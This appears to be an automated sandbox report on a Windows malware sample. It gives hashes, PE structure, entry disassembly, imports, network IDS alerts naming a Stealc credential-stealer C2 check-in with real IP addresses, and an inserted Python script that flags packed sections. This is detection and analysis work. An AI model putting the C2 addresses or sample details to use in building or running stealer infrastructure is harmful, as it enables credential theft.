                                                    Size (bytes):8328
                                                    Entropy (8bit):3.6971596548633197
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJSfl6H6YFr6SgmfpQPpDT89bh9sf8Lm:R6lXJw6H6Y56SgmfpQuh2fd
                                                    MD5:C7475FEC839F7016CC3FDBDAE12D2408
                                                    SHA1:23B45ABBE98D9FDDA0A5D8794A5A7981AC793CF4
                                                    SHA-256:2D886E54884190D2AE8426BE55B437470947BD989E83E74DE9EEACAEBACEDBFC
                                                    SHA-512:5EB2D6D5463A702CD2DB62C5C494DC6069D3A18304085EF692965D19E7F7835B217E6F4DA12B67C86B278A510EF29617F96EC3B8B7300AF867C503D5CAD3DB59
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.3.2.<./.P.i.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4569
                                                    Entropy (8bit):4.439851969695957
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsRJg77aI9DgWpW8VYWYm8M4J9SiDFyX+q8YtxQI9wbwd:uIjfjI7FZ7VeJ9BIXbt+I9wbwd
                                                    MD5:AEA1F879FB7A87528045731C843EC04D
                                                    SHA1:F4FADEEABBDD3577ABC8AE6D49D7336CD65F08C4
                                                    SHA-256:7C3DC04E242C46359F8D9EA11ACF508A6F643EC68F81188B86C5819116B4DC32
                                                    SHA-512:1AB460D2C2D30CD303F00D1ACFDAAD56F56BD1B7F14573A2A1CBE01B220D9EDC81F23BEC41DB285BB7C6AF83131520E8401C8204E8815E0E9B9E96EA7C511560
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="605570" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):286208
                                                    Entropy (8bit):6.465763879883113
                                                    Encrypted:false
                                                    SSDEEP:3072:pT2Bl1DMxK1kiekp7UjHGm6iSMnnqr7Nh3T+R9aN3LI2N7sIVI56zr/Tw5ACv5Vq:pT+XDEgUim6iSMn8PosN3Nei/
                                                    MD5:A969307FDB2862755469583A5D9BEA48
                                                    SHA1:6AE368E7FACFD00236F419A2A0ADE690C60CBD83
                                                    SHA-256:FCE03F73CAD97C884E0A45F073900ED19B432DCFC9173D91CF443C2FC6AC28F6
                                                    SHA-512:5DC36DA5226CE46E6F1AECA70D0877433C90B7EB977DBD41F5B648B65A1EC8AE4703FBE5828DBF8B77A7BA83DBD2A711ADA81EA4FF1307F0E76B21736EE705B2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 34%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........{~..{~..{~..4.{~..)...{~..).{~..)...{~......{~..{...{~..).{~..).{~..).{~.Rich.{~.................PE..L......f.................&...de..............@....@..........................ph..............................................Y..P.....g..............................................................................@...............................text...[%.......&.................. ..`.rdata..P#...@...$...*..............@..@.data.....c..p.......N..............@....xuxoz..HI...`g..>...j..............@....rsrc.........g.....................@..@........................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):286208
                                                    Entropy (8bit):6.465763879883113
                                                    Encrypted:false
                                                    SSDEEP:3072:pT2Bl1DMxK1kiekp7UjHGm6iSMnnqr7Nh3T+R9aN3LI2N7sIVI56zr/Tw5ACv5Vq:pT+XDEgUim6iSMn8PosN3Nei/
                                                    MD5:A969307FDB2862755469583A5D9BEA48
                                                    SHA1:6AE368E7FACFD00236F419A2A0ADE690C60CBD83
                                                    SHA-256:FCE03F73CAD97C884E0A45F073900ED19B432DCFC9173D91CF443C2FC6AC28F6
                                                    SHA-512:5DC36DA5226CE46E6F1AECA70D0877433C90B7EB977DBD41F5B648B65A1EC8AE4703FBE5828DBF8B77A7BA83DBD2A711ADA81EA4FF1307F0E76B21736EE705B2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 34%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........{~..{~..{~..4.{~..)...{~..).{~..)...{~......{~..{...{~..).{~..).{~..).{~.Rich.{~.................PE..L......f.................&...de..............@....@..........................ph..............................................Y..P.....g..............................................................................@...............................text...[%.......&.................. ..`.rdata..P#...@...$...*..............@..@.data.....c..p.......N..............@....xuxoz..HI...`g..>...j..............@....rsrc.........g.....................@..@........................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.4654045640696705
                                                    Encrypted:false
                                                    SSDEEP:6144:TIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNmdwBCswSbK:EXD94+WlLZMM6YFHM+K
                                                    MD5:99E9203001F632FBDAB2C784583BBF3D
                                                    SHA1:C72821DD6AB934A065442A09D01E82AFFCF1A436
                                                    SHA-256:937B51B7453E517F2A28040137A195CAA5F6E0522C0AC00AC9AF76D07A2E32D0
                                                    SHA-512:BD92EABA855A18946D28AC28E51D962C1D35133FE8B631B57F4635BE24EA1EF092BBDDEC8507D3D8B6E4963F0A7791FAA75BD62B10344368DDB126D236729EAE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...L@..............................................................................................................................................................................................................................................................................................................................................d(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.147837343312306
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:6X4BIzTTBR.exe
                                                    File size:413'184 bytes
                                                    MD5:5a45cfe0b266362b482cace7205c2c32
                                                    SHA1:29bdfb28ebeba5b07571898bf514e9f624606293
                                                    SHA256:a0e267be6b982f374175ffc83be37b3fcf351cbd1e9ee899d02fb7c722c55c7b
                                                    SHA512:03b613fef8c2c5e7136e3200d3d9097c7c0002acd6958a669fd078d1a7a78f5b62fe2afdd5c8609f9b64c5074f7d0012a3bcc6e86c917f601e5aab20fdfbbfdf
                                                    SSDEEP:6144:7MmB1z/wAu1tN0i1yZkdy3F4vLY5F5yp91gDO2t+ZGeS8y8PZ:7Mmrozj15IFMEypfQsGH8
                                                    TLSH:7B94F0217AF09131F3F75A341AB497905E7BB8B3AA71D44F23A4066A1E31BE08F21757
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............{~..{~..{~..4...{~..)...{~..)...{~..)...{~......{~..{...{~..)...{~..)...{~..)...{~.Rich.{~.................PE..L......d...
                                                    Icon Hash:46c7c30b0f0e0d59
                                                    Entrypoint:0x401906
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x64F48E0B [Sun Sep 3 13:45:47 2023 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:f6afe1d4f723ac968dae096d10844733
                                                    Instruction
                                                    call 00007FB7D9362B5Ah
                                                    jmp 00007FB7D935F89Dh
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 00000328h
                                                    mov dword ptr [00457C08h], eax
                                                    mov dword ptr [00457C04h], ecx
                                                    mov dword ptr [00457C00h], edx
                                                    mov dword ptr [00457BFCh], ebx
                                                    mov dword ptr [00457BF8h], esi
                                                    mov dword ptr [00457BF4h], edi
                                                    mov word ptr [00457C20h], ss
                                                    mov word ptr [00457C14h], cs
                                                    mov word ptr [00457BF0h], ds
                                                    mov word ptr [00457BECh], es
                                                    mov word ptr [00457BE8h], fs
                                                    mov word ptr [00457BE4h], gs
                                                    pushfd
                                                    pop dword ptr [00457C18h]
                                                    mov eax, dword ptr [ebp+00h]
                                                    mov dword ptr [00457C0Ch], eax
                                                    mov eax, dword ptr [ebp+04h]
                                                    mov dword ptr [00457C10h], eax
                                                    lea eax, dword ptr [ebp+08h]
                                                    mov dword ptr [00457C1Ch], eax
                                                    mov eax, dword ptr [ebp-00000320h]
                                                    mov dword ptr [00457B58h], 00010001h
                                                    mov eax, dword ptr [00457C10h]
                                                    mov dword ptr [00457B0Ch], eax
                                                    mov dword ptr [00457B00h], C0000409h
                                                    mov dword ptr [00457B04h], 00000001h
                                                    mov eax, dword ptr [00456008h]
                                                    mov dword ptr [ebp-00000328h], eax
                                                    mov eax, dword ptr [0045600Ch]
                                                    mov dword ptr [ebp-00000324h], eax
                                                    call dword ptr [000000D8h]
                                                    Programming Language:
                                                    • [C++] VS2008 build 21022
                                                    • [ASM] VS2008 build 21022
                                                    • [ C ] VS2008 build 21022
                                                    • [IMP] VS2005 build 50727
                                                    • [RES] VS2008 build 21022
                                                    • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5499c | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x269a000 | 0xb5c0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x54540 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x53000 | 0x1a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x515cb | 0x51600 | 28db675362858fef1345476d197795d0 | False | 0.8379476286482335 | data | 7.550335465117481 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x53000 | 0x2350 | 0x2400 | 9d68cbd2b37ae3239eed892804189a60 | False | 0.3617621527777778 | SysEx File - Teac | 5.4894080575347735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x56000 | 0x263e2dc | 0x1c00 | 6cea03b636b5fb9212993ae59cbc7a00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.xarocuz | 0x2695000 | 0x4948 | 0x3e00 | 51596dda30fc38f0df3556d6f115256d | False | 0.0023941532258064517 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x269a000 | 0xb5c0 | 0xb600 | e613c810d7bb68a8aa8c57185477c5b0 | False | 0.6486521291208791 | data | 5.913797239574168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
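Two rows of the section table above carry the triage signal: a .text section at 7.55 bits/byte of entropy (compiled code normally sits well below 7) and a .data section whose virtual size, roughly 40 MB, is about 5,600 times its 7 KB of raw data, so the loader maps a huge zero-filled region at run time. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample: it applies a few section-header heuristics to those transcribed values. The thresholds and the set of "known" section names are this example's own assumptions. Note that the dropped 286,208-byte PE listed earlier is a different build (its preview shows a ".xuxoz" section rather than ".xarocuz"), so its own header values would have to be transcribed separately.

```python
# Added example (not part of the Joe Sandbox report and not the sample's code):
# a few header heuristics a triager applies to a PE section table, run here on
# the values transcribed from the Sections table above. Thresholds and the set
# of "known" section names are this example's own assumptions.
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Section names the MSVC toolchain normally emits (assumption: anything else is
# worth a second look, which is how packer-added sections get noticed).
KNOWN_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
               ".edata", ".pdata", ".tls", ".bss", ".CRT", ".gfids", ".00cfg"}


@dataclass
class Section:
    name: str
    vaddr: int
    vsize: int
    rawsize: int
    entropy: Optional[float]      # None where the report says "unknown"
    characteristics: Set[str]


# Transcribed from the Sections table of this report for 6X4BIzTTBR.exe.
SECTIONS: List[Section] = [
    Section(".text", 0x1000, 0x515cb, 0x51600, 7.550335465117481,
            {"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"}),
    Section(".rdata", 0x53000, 0x2350, 0x2400, 5.4894080575347735,
            {"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"}),
    Section(".data", 0x56000, 0x263e2dc, 0x1c00, None,
            {"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ",
             "IMAGE_SCN_MEM_WRITE"}),
    Section(".xarocuz", 0x2695000, 0x4948, 0x3e00, 0.0,
            {"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ",
             "IMAGE_SCN_MEM_WRITE"}),
    Section(".rsrc", 0x269a000, 0xb5c0, 0xb600, 5.913797239574168,
            {"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"}),
]


def section_findings(sections: List[Section], entropy_threshold: float = 7.2,
                     bloat_ratio: int = 16) -> Dict[str, List[str]]:
    """Map section name -> findings for sections that look packed, bloated,
    writable+executable, constant-filled or oddly named."""
    findings: Dict[str, List[str]] = {}
    for s in sections:
        notes: List[str] = []
        execute = "IMAGE_SCN_MEM_EXECUTE" in s.characteristics
        write = "IMAGE_SCN_MEM_WRITE" in s.characteristics
        # Compiled code sits around 6.0-6.8 bits/byte; >= 7.2 reads as packed/encrypted.
        if execute and s.entropy is not None and s.entropy >= entropy_threshold:
            notes.append("high-entropy code section (packed or encrypted code)")
        # Huge virtual size on tiny raw data: the loader maps a large zero-filled
        # region, which bloats memory and is a common sandbox-evasion trick.
        if s.rawsize and s.vsize // s.rawsize >= bloat_ratio:
            notes.append(f"virtual size {s.vsize:#x} is {s.vsize // s.rawsize}x "
                         f"the raw size {s.rawsize:#x} (large zero-filled region)")
        if execute and write:
            notes.append("section is both writable and executable")
        if s.name not in KNOWN_NAMES:
            notes.append("non-standard section name")
        # Entropy exactly 0 means every raw byte is identical: a placeholder the
        # unpacker fills at run time rather than real initialized data.
        if s.entropy == 0.0 and s.rawsize:
            notes.append("raw bytes are all identical (placeholder filled at run time)")
        if notes:
            findings[s.name] = notes
    return findings


def image_footprint(sections: List[Section]) -> int:
    """Bytes the loader must map: end of the highest section (headers excluded)."""
    last = max(sections, key=lambda s: s.vaddr)
    return last.vaddr + last.vsize


def disk_footprint(sections: List[Section]) -> int:
    """Bytes of section data actually present in the file (headers excluded)."""
    return sum(s.rawsize for s in sections)


if __name__ == "__main__":
    for name, notes in section_findings(SECTIONS).items():
        for note in notes:
            print(f"{name:<9} {note}")
    print(f"mapped: {image_footprint(SECTIONS) / 2**20:.1f} MiB, "
          f"on disk: {disk_footprint(SECTIONS) / 2**10:.0f} KiB")
```

Run stand-alone it flags .text for entropy, .data for the virtual/raw size gap, and .xarocuz for its name and all-identical raw bytes, while .rdata and .rsrc pass; the 412,160 bytes of section data on disk plus the 0x400-byte header region account for the reported 413,184-byte file size, and the mapped image is about 38.6 MiB.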
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x269a4e0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Sanskrit | India | 0.8432835820895522
RT_ICON | 0x269b388 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Sanskrit | India | 0.8759025270758123
RT_ICON | 0x269bc30 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Sanskrit | India | 0.7793778801843319
RT_ICON | 0x269c2f8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Sanskrit | India | 0.7933526011560693
RT_ICON | 0x269c860 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Sanskrit | India | 0.8066390041493776
RT_ICON | 0x269ee08 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Sanskrit | India | 0.8327861163227017
RT_ICON | 0x269feb0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Sanskrit | India | 0.8438524590163935
RT_ICON | 0x26a0838 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Sanskrit | India | 0.8581560283687943
RT_STRING | 0x26a0ed8 | 0x59c | data | | | 0.44220055710306405
RT_STRING | 0x26a1478 | 0x4ba | data | | | 0.4628099173553719
RT_STRING | 0x26a1938 | 0x122 | data | | | 0.5275862068965518
RT_STRING | 0x26a1a60 | 0x64c | data | | | 0.43548387096774194
RT_STRING | 0x26a20b0 | 0x6e8 | data | | | 0.4247737556561086
RT_STRING | 0x26a2798 | 0x6c6 | data | | | 0.43771626297577854
RT_STRING | 0x26a2e60 | 0x696 | data | | | 0.4294187425860024
RT_STRING | 0x26a34f8 | 0x686 | data | | | 0.4365269461077844
RT_STRING | 0x26a3b80 | 0x6d2 | data | | | 0.4289805269186712
RT_STRING | 0x26a4258 | 0x666 | data | | | 0.43956043956043955
RT_STRING | 0x26a48c0 | 0x6e0 | data | | | 0.4244318181818182
RT_STRING | 0x26a4fa0 | 0x61a | data | | | 0.44046094750320103
RT_ACCELERATOR | 0x26a0d18 | 0x20 | data | | | 1.15625
RT_GROUP_ICON | 0x26a0ca0 | 0x76 | data | Sanskrit | India | 0.6610169491525424
RT_VERSION | 0x26a0d38 | 0x1a0 | data | | | 0.5745192307692307
DLL | Import
KERNEL32.dll | GetNumaNodeProcessorMask, SetDefaultCommConfigA, SetThreadContext, GetLocaleInfoA, WriteConsoleOutputCharacterA, OpenJobObjectA, GetConsoleAliasA, InterlockedDecrement, GetSystemWindowsDirectoryW, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetProcessHandleCount, GetConsoleAliasExesLengthW, WriteConsoleOutputA, GetTimeFormatW, GetVolumePathNameA, GetStringTypeExA, GetConsoleAliasesW, GetLastError, GetProcAddress, GetComputerNameA, LoadLibraryA, WriteConsoleA, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, AddAtomA, SetCommMask, FindAtomA, CreatePipe, GetModuleFileNameA, OpenFileMappingW, BuildCommDCBA, GetShortPathNameW, SetCalendarInfoA, SetThreadAffinityMask, GetSystemTime, GetModuleHandleA, MoveFileW, GetCommandLineW, HeapFree, HeapAlloc, HeapReAlloc, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, WriteFile, GetStdHandle, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, MultiByteToWideChar, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, CloseHandle, GetConsoleOutputCP, WriteConsoleW, CreateFileA, RaiseException
USER32.dll | GetClassLongA, GetMonitorInfoA
ADVAPI32.dll | RegCreateKeyA
Language of compilation system | Country where language is spoken | Map
Sanskrit | India
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-26T22:47:10.220831+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 172.67.179.207 | 443 | TCP
2024-11-26T22:47:11.804571+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | TCP
2024-11-26T22:47:29.434017+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49738 | 92.255.57.88 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Nov 26, 2024 22:47:12.455955029 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.459103107 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.459146976 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.459276915 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.459330082 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.462439060 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.462486029 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.462544918 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.462579966 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.465768099 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.465809107 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.465933084 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.465976000 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.469096899 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.469144106 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.469223022 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.469265938 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.472417116 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.472457886 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.472533941 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.472573996 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.475790024 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.475835085 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.475894928 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.475934029 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.479070902 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.479116917 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.479195118 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.479243040 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.482450008 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.482492924 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.482556105 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.482592106 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.485696077 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.485739946 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.485800028 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.485837936 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.489377975 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.489423037 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.489494085 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.489532948 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.492854118 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.492897987 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.492980957 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.493026018 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.496689081 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.496706963 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.496730089 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.496742964 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.498944998 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.498986959 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.572770119 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.572871923 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.572940111 CET8049731176.113.115.37192.168.2.4
                                                    Nov 26, 2024 22:47:12.572988987 CET4973180192.168.2.4176.113.115.37
                                                    Nov 26, 2024 22:47:12.574166059 CET8049731176.113.115.37192.168.2.4
